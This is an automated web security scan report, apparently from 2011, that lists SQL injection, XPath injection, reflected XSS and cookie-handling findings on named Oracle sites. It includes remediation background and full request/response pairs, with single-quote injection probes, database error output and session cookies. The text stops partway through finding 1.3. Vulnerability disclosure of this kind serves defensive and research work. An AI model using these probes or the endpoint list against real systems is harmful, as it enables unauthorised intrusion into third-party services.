XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, Oracle HTTP Systems

Report generated by XSS.CX at Mon Oct 17 08:13:44 CDT 2011.


Loading


1. SQL injection

1.1. http://apex.oracle.com/pls/otn/f [p parameter]

1.2. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [curloc parameter]

1.3. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [degree parameter]

1.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [email parameter]

1.5. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [fname1 parameter]

1.6. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [gdate parameter]

1.7. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [lname1 parameter]

1.8. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [major parameter]

1.9. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [phone parameter]

1.10. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [ploc parameter]

1.11. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position1 parameter]

1.12. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position2 parameter]

1.13. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [position3 parameter]

1.14. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [university parameter]

1.15. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_arg_names parameter]

1.16. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_flow_step_id parameter]

1.17. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [User-Agent HTTP header]

1.18. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [gpw_e24 cookie]

1.19. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [p_cur_URL cookie]

1.20. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_nr cookie]

1.21. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_sess cookie]

1.22. http://crmondemand.oracle.com/ocom/resources/wcm/sitestudio/wcm.toggle.js [s_wgw_lv cookie]

1.23. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [gpw_e24 cookie]

1.24. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [s_cc cookie]

1.25. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [s_nr cookie]

1.26. https://irecruitment.oracle.com/OA_HTML/OA.jsp [GSI cookie]

1.27. https://shop.oracle.com/pls/ostore/f [p parameter]

1.28. https://shop.oracle.com/pls/ostore/f [s_sess cookie]

1.29. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t03 parameter]

1.30. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t04 parameter]

1.31. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t13 parameter]

1.32. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t18 parameter]

1.33. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t19 parameter]

1.34. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t31 parameter]

1.35. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t32 parameter]

1.36. http://solutions.oracle.com/portal/page/portal/searchresults [mo parameter]

2. XPath injection

2.1. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [GSI cookie]

2.2. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [ORA_MOS_LOCALE cookie]

2.3. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [Referer HTTP header]

2.4. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [User-Agent HTTP header]

2.5. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [gpv_p24 cookie]

2.6. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [gpw_e24 cookie]

2.7. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [name of an arbitrarily supplied request parameter]

2.8. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_cur_URL cookie]

2.9. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_lang cookie]

2.10. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [p_org_id cookie]

2.11. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_cc cookie]

2.12. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_nr cookie]

2.13. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_nr6 cookie]

2.14. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_pers cookie]

2.15. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_sess cookie]

2.16. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_sq cookie]

2.17. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js [s_wgw_lv cookie]

3. Cross-site scripting (reflected)

3.1. https://campus.oracle.com/campus/HR/us-profile-direct.jsp [flag parameter]

3.2. https://campus.oracle.com/campus/HR/us-upload-file.jsp [flag parameter]

3.3. https://cloud.oracle.com/mycloud/wwv_flow.accept [p_md5_checksum parameter]

3.4. http://events.oracle.com/search/search [keyword parameter]

3.5. http://events.oracle.com/search/search [name of an arbitrarily supplied request parameter]

3.6. http://events.oracle.com/search/search [pageHitCount parameter]

3.7. http://events.oracle.com/search/search [start parameter]

3.8. https://login.oracle.com/oam/server/sso/auth_cred_submit [request_id parameter]

3.9. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp [name of an arbitrarily supplied request parameter]

3.10. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwsbr_javascript.page_js [REST URL parameter 3]

3.11. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwui_api_body.render_wizard_css [REST URL parameter 3]

3.12. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_basedm.show_translations [REST URL parameter 3]

3.13. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_javascript.fetch_script [REST URL parameter 3]

3.14. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_css [REST URL parameter 3]

3.15. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_custom_css [REST URL parameter 3]

3.16. http://solutions.oracle.com/portal/pls/portal/PORTAL.wwv_setting.render_custom_css [p_bg_color parameter]

4. SSL cookie without secure flag set

4.1. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp

4.2. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp

4.3. https://campus.oracle.com/campus/HR/us-calendar.jsp

4.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp

4.5. https://campus.oracle.com/campus/HR/us-profile-direct.jsp

4.6. https://campus.oracle.com/campus/HR/us-upload-file.jsp

4.7. https://cloud.oracle.com/mycloud/f

4.8. https://cloud.oracle.com/mycloud/wwv_flow.accept

4.9. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp

4.10. https://login.oracle.com/favicon.ico

4.11. https://login.oracle.com/mysso/signon.jsp

4.12. https://login.oracle.com/mysso/sso_loginui/b-bg.gif

4.13. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif

4.14. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif

4.15. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif

4.16. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif

4.17. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif

4.18. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif

4.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif

4.20. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif

4.21. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif

4.22. https://login.oracle.com/mysso/sso_loginui/loginStyling_external.css

4.23. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

4.24. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif

4.25. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif

4.26. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif

4.27. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif

4.28. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif

4.29. https://login.oracle.com/mysso/sso_loginui/sso_check.js

4.30. https://login.oracle.com/mysso/sso_loginui/t-bg.gif

4.31. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif

4.32. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif

4.33. https://login.oracle.com/oam/server/sso/auth_cred_submit

4.34. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

4.35. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp

4.36. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp

5. Session token in URL

5.1. https://campus.oracle.com/campus/HR/global_home.html

5.2. https://cloud.oracle.com/mycloud/APEX_040100.wwv_flow_image_generator.get_image

5.3. https://cloud.oracle.com/mycloud/f

5.4. https://cloud.oracle.com/mycloud/wwv_flow.accept

5.5. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

6. Cookie without HttpOnly flag set

6.1. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp

6.2. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp

6.3. https://campus.oracle.com/campus/HR/us-calendar.jsp

6.4. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp

6.5. https://campus.oracle.com/campus/HR/us-profile-direct.jsp

6.6. https://campus.oracle.com/campus/HR/us-upload-file.jsp

6.7. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp

6.8. https://irecruitment.oracle.com/OA_HTML/OA.jsp

6.9. https://irecruitment.oracle.com/OA_HTML/RF.jsp

6.10. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp

6.11. https://cloud.oracle.com/mycloud/f

6.12. https://cloud.oracle.com/mycloud/wwv_flow.accept

6.13. https://login.oracle.com/favicon.ico

6.14. https://login.oracle.com/mysso/signon.jsp

6.15. https://login.oracle.com/mysso/sso_loginui/b-bg.gif

6.16. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif

6.17. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif

6.18. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif

6.19. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif

6.20. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif

6.21. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif

6.22. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif

6.23. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif

6.24. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif

6.25. https://login.oracle.com/mysso/sso_loginui/loginStyling_external.css

6.26. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

6.27. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif

6.28. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif

6.29. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif

6.30. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif

6.31. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif

6.32. https://login.oracle.com/mysso/sso_loginui/sso_check.js

6.33. https://login.oracle.com/mysso/sso_loginui/t-bg.gif

6.34. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif

6.35. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif

6.36. https://login.oracle.com/oam/server/sso/auth_cred_submit

6.37. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

6.38. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp

6.39. http://solutions.oracle.com/

6.40. http://solutions.oracle.com/portal/page/portal/OPN/sol_cat_wrapper

6.41. http://solutions.oracle.com/portal/page/portal/OPN/sol_cat_wrapper/

6.42. http://solutions.oracle.com/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/

6.43. http://solutions.oracle.com/specializedpartners/

7. Source code disclosure

8. Cross-domain POST

9. Cookie scoped to parent domain

9.1. https://irecruitment.oracle.com/OA_HTML/IrcVisitor.jsp

9.2. https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp

9.3. https://oraclestore.oracle.com/OA_HTML/ibeCZzpHome.jsp

10. Cross-domain Referer leakage

10.1. http://apex.oracle.com/pls/otn/f

10.2. http://events.oracle.com/search/search

11. Cross-domain script include

11.1. https://campus.oracle.com/campus/HR/aus_main.html

11.2. https://campus.oracle.com/campus/HR/cn_main.html

11.3. https://campus.oracle.com/campus/HR/india_main.html

11.4. https://campus.oracle.com/campus/HR/sg_main.html

11.5. http://crmondemand.oracle.com/en/index.htm.

11.6. http://events.oracle.com/search/search

11.7. http://solutions.oracle.com/home/basic_search

11.8. http://solutions.oracle.com/portal/page/portal/auto_searches/browse_products/

11.9. http://solutions.oracle.com/portal/page/portal/auto_searches/partners/specializations/applications/oracle_policy_automation/

11.10. http://solutions.oracle.com/portal/page/portal/error

11.11. http://solutions.oracle.com/portal/page/portal/searchresults

11.12. http://solutions.oracle.com/solutions/bmg/consulting

11.13. http://solutions.oracle.com/specializedpartners/

12. File upload functionality

13. Email addresses disclosed

13.1. https://campus.oracle.com/campus/HR/aus_main.html

13.2. https://campus.oracle.com/campus/HR/cn_main.html

13.3. https://campus.oracle.com/campus/HR/emea_main.html

13.4. https://campus.oracle.com/campus/HR/india_main.html

13.5. https://campus.oracle.com/campus/HR/japan_main.html

13.6. https://campus.oracle.com/campus/HR/script/s_code.js

13.7. https://campus.oracle.com/campus/HR/sg_main.html

13.8. https://campus.oracle.com/campus/HR/zealand-apply.html

13.9. https://campus.oracle.com/campus/campus_feed.xml

13.10. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html

13.11. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/adapter/ext/ext-base.js

13.12. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/ext-all.js

13.13. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/js/ext/resources/css/ext-all.css

13.14. http://crmondemand.oracle.com/error/s_code.js

13.15. https://irecruitment.oracle.com/OA_HTML/OA.jsp

13.16. https://irecruitment.oracle.com/OA_HTML/RF.jsp

13.17. https://irecruitment.oracle.com/OA_HTML/s_code.js

13.18. https://shop.oracle.com/pls/ostore/f

13.19. http://solutions.oracle.com/img/opn_navtree.js

13.20. http://solutions.oracle.com/img/s_code19b.js

13.21. http://solutions.oracle.com/portal/page/portal/searchresults

14. Credit card numbers disclosed

14.1. https://cloud.oracle.com/mycloud/f

14.2. https://cloud.oracle.com/mycloud/wwv_flow.accept

15. Cacheable HTTPS response

15.1. https://campus.oracle.com/campus/

15.2. https://campus.oracle.com/campus/HR/apac-subscribe.html

15.3. https://campus.oracle.com/campus/HR/apac_internship.html

15.4. https://campus.oracle.com/campus/HR/aus_main.html

15.5. https://campus.oracle.com/campus/HR/cn_main.html

15.6. https://campus.oracle.com/campus/HR/emea-apply%20now.jsp

15.7. https://campus.oracle.com/campus/HR/emea-internship.html

15.8. https://campus.oracle.com/campus/HR/emea1-jobs-remove1.jsp

15.9. https://campus.oracle.com/campus/HR/emea_main.html

15.10. https://campus.oracle.com/campus/HR/global_aboutus.html

15.11. https://campus.oracle.com/campus/HR/global_current-openings.html

15.12. https://campus.oracle.com/campus/HR/global_history.html

15.13. https://campus.oracle.com/campus/HR/global_home.html

15.14. https://campus.oracle.com/campus/HR/global_internship.html

15.15. https://campus.oracle.com/campus/HR/global_main.html

15.16. https://campus.oracle.com/campus/HR/global_main_about.html

15.17. https://campus.oracle.com/campus/HR/global_scope.html

15.18. https://campus.oracle.com/campus/HR/global_vision.html

15.19. https://campus.oracle.com/campus/HR/global_why.html

15.20. https://campus.oracle.com/campus/HR/hk_main.html

15.21. https://campus.oracle.com/campus/HR/india_main.html

15.22. https://campus.oracle.com/campus/HR/indo_main.html

15.23. https://campus.oracle.com/campus/HR/instructions.html

15.24. https://campus.oracle.com/campus/HR/japan_main.html

15.25. https://campus.oracle.com/campus/HR/korea_main.html

15.26. https://campus.oracle.com/campus/HR/lad-internship.html

15.27. https://campus.oracle.com/campus/HR/lad_main.html

15.28. https://campus.oracle.com/campus/HR/malay_main.html

15.29. https://campus.oracle.com/campus/HR/news.html

15.30. https://campus.oracle.com/campus/HR/pak_main.html

15.31. https://campus.oracle.com/campus/HR/ph_main.html

15.32. https://campus.oracle.com/campus/HR/sg_main.html

15.33. https://campus.oracle.com/campus/HR/sitemap.html

15.34. https://campus.oracle.com/campus/HR/thai_main.html

15.35. https://campus.oracle.com/campus/HR/transition_4.html

15.36. https://campus.oracle.com/campus/HR/us-apply_now.html

15.37. https://campus.oracle.com/campus/HR/us-calendar.jsp

15.38. https://campus.oracle.com/campus/HR/us-home.html

15.39. https://campus.oracle.com/campus/HR/us-internship-global.html

15.40. https://campus.oracle.com/campus/HR/us-profile-direct.jsp

15.41. https://campus.oracle.com/campus/HR/us-profile.html

15.42. https://campus.oracle.com/campus/HR/us-profile_mobile.html

15.43. https://campus.oracle.com/campus/HR/us-profile_mobile_redirect.html

15.44. https://campus.oracle.com/campus/HR/us-upload-file.jsp

15.45. https://campus.oracle.com/campus/HR/us_main.html

15.46. https://campus.oracle.com/campus/HR/viet_main.html

15.47. https://campus.oracle.com/campus/HR/zealand-apply.html

15.48. https://campus.oracle.com/campus/HR/zealand-home.html

15.49. https://campus.oracle.com/campus/HR/zealand_main.html

15.50. https://campus.oracle.com/campus/campus_feed.xml

15.51. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html

15.52. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/TodoApp.html

15.53. https://cloud.oracle.com/mycloud/f

15.54. https://cloud.oracle.com/mycloud/wwv_flow.accept

15.55. https://irecruitment.oracle.com/OA_HTML/OA.jsp

15.56. https://irecruitment.oracle.com/OA_HTML/RF.jsp

15.57. https://irecruitment.oracle.com/OA_HTML/blank.html

15.58. https://login.oracle.com/oam/server/sso/auth_cred_submit

15.59. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

15.60. https://shop.oracle.com/

15.61. https://shop.oracle.com/pls/ostore/f

16. HTML does not specify charset

16.1. https://campus.oracle.com/campus/gwt/otn.todo.TodoApp/3C4F2E3489E5DDA185EB977FEEAA0A3B.cache.html

16.2. http://crmondemand.oracle.com/favicon.ico

16.3. http://crmondemand.oracle.com/ocom/resources/sitestudio/ssajax/ssajax.js

16.4. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigation.js

16.5. http://events.oracle.com/

16.6. https://irecruitment.oracle.com/OA_HTML/blank.html

16.7. https://shop.oracle.com/

17. Content type incorrectly stated

17.1. https://campus.oracle.com/campus/HR/images/bullet2.png

17.2. https://shop.oracle.com/pls/ostore/f

17.3. http://solutions.oracle.com/img/opn_sc7.css

18. Content type is not specified

18.1. https://login.oracle.com/mysso/sso_loginui/moc_lib.js

18.2. https://login.oracle.com/mysso/sso_loginui/sso_check.js

18.3. https://login.oracle.com/oam/server/sso/auth_cred_submit

18.4. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login



1. SQL injection  next
There are 36 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://apex.oracle.com/pls/otn/f [p parameter]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://apex.oracle.com
Path:   /pls/otn/f

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pls/otn/f?p=42988:2' HTTP/1.1
Host: apex.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.oracle.com/us/corporate/contact/about-your-account-070507.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_cc=true; s_nr=1318816293527; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fus%2Fcorporate%2Fcontact%2Fabout-your-account-070507.html; s_sq=oraclecom%2Coracleglobal%3D%2526pid%253Docom%25253Aen-us%25253A%25252Fcorporate%25252Fcontact%25252Fabout-your-account-070507.html%2526pidt%253D1%2526oid%253Djavascript%25253AopenWindow('http%25253A%25252F%25252Fapex.oracle.com%25252Fpls%25252Fotn%25252Ff%25253Fp%25253D42988%25253A2'%25252C''%25252C'595'%25252C'435')%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 01:55:05 GMT
Server: Oracle-Application-Server-11g
Content-Length: 518
Content-Type: text/html; charset=UTF-8
Content-Language: en

<table summary=""><tr><td><img src="/i/error.gif" border="0" /></td><td>Error</td><td>ERR-1412 Unable to resolve page alias (2').</td></tr><tr><td></td><td></td><td>ORA-06502: PL/SQL: numeric or value error: character to number conversion error
ORA-06502: PL/SQL: numeric or value error: character to number conversion error</td>
...[SNIP]...

1.2. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [curloc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The curloc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the curloc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss'&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 1

HTTP/1.1 500 Internal Server Error
Date: Mon, 17 Oct 2011 12:45:44 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Length: 2899
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Connection: close
Content-Type: text/html; charset=UTF-8

<HTML><HEAD><TITLE>500 Internal Server Error</TITLE></HEAD><BODY><H1>500 Internal Server Error</H1><PRE>java.sql.SQLException: ORA-00933: SQL command not properly ended<br>    at oracle.jdbc.driver.Datab
...[SNIP]...

Request 2

GET /campus/HR/us-profile-add-direct.jsp?lname1=xss&fname1=xss&phone=xss&email=xss%40oa.com&university=xss&gdate=01%2F01%2F2012&degree=Bachelors&major=xss&curloc=xss''&ploc=xss&position1=FINANCE%2F+Accounting+%2FFT+%2FBay+Area+and+Rocklin%2C+CA&position2=Any&position3=xss&Submit=SAVE HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/us-profile-direct.jsp?flag=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=%5B%5BB%5D%5D; _csoot=1318855007970; _csuid=X1e259aff5df73e

Response 2

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:45:44 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Content-Location: http://campus.oracle.com/campus/HR/us-profile-direct.jsp
Set-Cookie: JSESSIONID=8d9228d330d52f397c87bdd64c15a15af635e7f386ff.e38KbheQbhyQbi0Oc34Lc3uMchn0; path=/campus
Pragma: no-cache
Cache-Control: no-store
Expires: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 28029

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"
...[SNIP]...

1.3. https://campus.oracle.com/campus/HR/us-profile-add-direct.jsp [degree parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/us-profile-add-direct.jsp

Issue detail

The degree parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the degree parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

